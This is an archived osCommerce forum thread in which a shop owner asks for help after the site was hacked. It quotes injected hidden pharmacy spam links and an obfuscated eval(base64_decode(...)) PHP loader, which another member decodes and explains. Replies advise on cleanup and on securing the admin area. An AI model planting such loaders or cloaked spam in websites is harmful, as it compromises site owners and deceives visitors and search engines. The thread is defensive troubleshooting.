Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Hacked Site


dusty108

Recommended Posts

v2.2RC2

Google keywords has alerted me to the presence of the word "Cialis" on two of my web pages. When I checked the pages viewing the source this is what I found tagged on at the bottom of the page:

 

First Page: http://www.landnsea.co.uk/sailing-c-21.html

<br>

<script>document.write("<p sty"+"le=displ"+"ay:no"+"ne>");</script>

<a href="http://www.premierinternet.com">generic cialis online</a>

<a href="http://www.jan-oidium.com">generic cialis</a>

<a href="http://www.cbn.co.za">generic viagra online</a>

<a href="http://www.cantors.org">cheap cialis</a>

<a href="http://www.technosci.com">cialis online</a>

<a href="http://www.lolitadress.net">generic cialis online</a>

<a href="http://www.mendocino-chocolate.com">cheap generic cialis</a>

<a href="http://www.apoprecords.com">cialis no prescription</a>

<a href="http://www.cardinalcorner.com">order cialis online</a>

<a href="http://vehicleemergencylighting.com">online pharmacy cialis</a>

<a href="http://www.tantrastoreonline.com">cialis price</a>

<a href="http://www.polhn.org">order cheap drugs online</a>

</p>

</body>

</html>

Second Page: http://www.landnsea.co.uk/penn-m-14.html

<!-- footer_eof //-->

<br>

<script>document.write("<p sty"+"le=displ"+"ay:no"+"ne>");</script>

<a href="http://www.premierinternet.com">generic cialis online</a>

<a href="http://www.jan-oidium.com">generic cialis</a>

<a href="http://www.cbn.co.za">generic viagra online</a>

<a href="http://www.cantors.org">cheap cialis</a>

<a href="http://www.technosci.com">cialis online</a>

<a href="http://www.lolitadress.net">generic cialis online</a>

<a href="http://www.mendocino-chocolate.com">cheap generic cialis</a>

<a href="http://www.apoprecords.com">cialis no prescription</a>

<a href="http://www.cardinalcorner.com">order cialis online</a>

<a href="http://vehicleemergencylighting.com">online pharmacy cialis</a>

<a href="http://www.tantrastoreonline.com">cialis price</a>

<a href="http://www.polhn.org">order cheap drugs online</a>

</p>

</body>

</html>

 

How do I go about cleaning this up? Can I just go back to a safe back up date? File permissions are all set at 755/644.

Link to comment
Share on other sites

You need to find out HOW the hack happened, then plug the hole. Reverting to a backup is no good.

 

You need to rename and password protect your Admin area NOW. I have messaged you somethin interesting.

Link to comment
Share on other sites

You need to find out HOW the hack happened, then plug the hole. Reverting to a backup is no good.

 

You need to rename and password protect your Admin area NOW. I have messaged you somethin interesting.

 

Thanks Burt. That was rather surprising. Can you help with renaming admin ? I tried changing admin name but when I log in I have problems going through the different menus as they keeping looking for admin.

Link to comment
Share on other sites

Log in FTP, rename the /admin/ folder to something completely random which would be hard to guess for anyone except you. Eg; /admin_qqq0wo38cnS/

 

Then download the file at

 

*your new admin name*/includes/configure.php

 

In that file, you'll find two or three instances of "admin" , change that to the same as your newly renamed admin area. Upload it.

 

Then use cPanel (or whatver host control panel you have) to password protect the admin using htaccess/htpasswd

Link to comment
Share on other sites

Oh and now find the security thread (it's a long one) and do all the security changes and sanitise your site of any existing bad code.

I have found the following code has been inserted in a random selection of files on my site: Do you think it could be the culprit?

 

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy92YXIvd3d3L3Zob3N0cy9sYW5kbnNlYS5jby51ay9odHRwZG9jcy9sYW5kbnNlYS9hZG1pbi9pbmNsdWRlcy9sYW5ndWFnZXMvZW5nbGlzaC9tb2R1bGVzL2luZGV4L3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>

Link to comment
Share on other sites

Decodes to:

 

  if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){
   $GLOBALS['mfsn'] = '/var/www/vhosts/YOUR_DOMAIN.co.uk/httpdocs/YOUR_DOMAIN/admin/includes/languages/english/modules/index/style.css.php';
   if(file_exists($GLOBALS['mfsn'])){
     include_once($GLOBALS['mfsn']);
     if(function_exists('gml')&&function_exists('dgobh')){
       ob_start('dgobh');
     }
   }
  }

It's hack code.

 

Also tells where to find one of their files.

 

/admin/includes/languages/english/modules/index/style.css.php

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

Thanks for decoding that for me. When I followed the path admin/includes/languages/english/modules/index/ The only files were customers.php and orders.php. No style.css.php. Strange?

Link to comment
Share on other sites

I didn't make the soup, Doc, I can only tell you what's in it...

:blush:

 

The early versions of this hack showed their trash to anyone that viewed the page.

 

Now they have it programmed that it shows only when search engines index the site (keying off IP addresses).

 

You don't even know you're hacked unless you look at your cache in google or see the code in your files.

:'(

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

My host has scanned my site and removed the infection their scanners picked up. The problem no longer shows on the two files I quoted earlier. I'm going to have to sort out my admin file and see what else I can do to secure my site. Thanks for your help.

Link to comment
Share on other sites

My host has scanned my site and removed the infection their scanners picked up. The problem no longer shows on the two files I quoted earlier. I'm going to have to sort out my admin file and see what else I can do to secure my site. Thanks for your help.

There is a thread in this area on "How to Secure Your SIte".

 

Read that.

 

Part of it is removing the file_manager.php and define_language.php in your admin. I went to your site and the admin isn't protected by .htaccess.

 

That being said, they can get into the site via a vulnerability in the aforementioned files.

:o

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...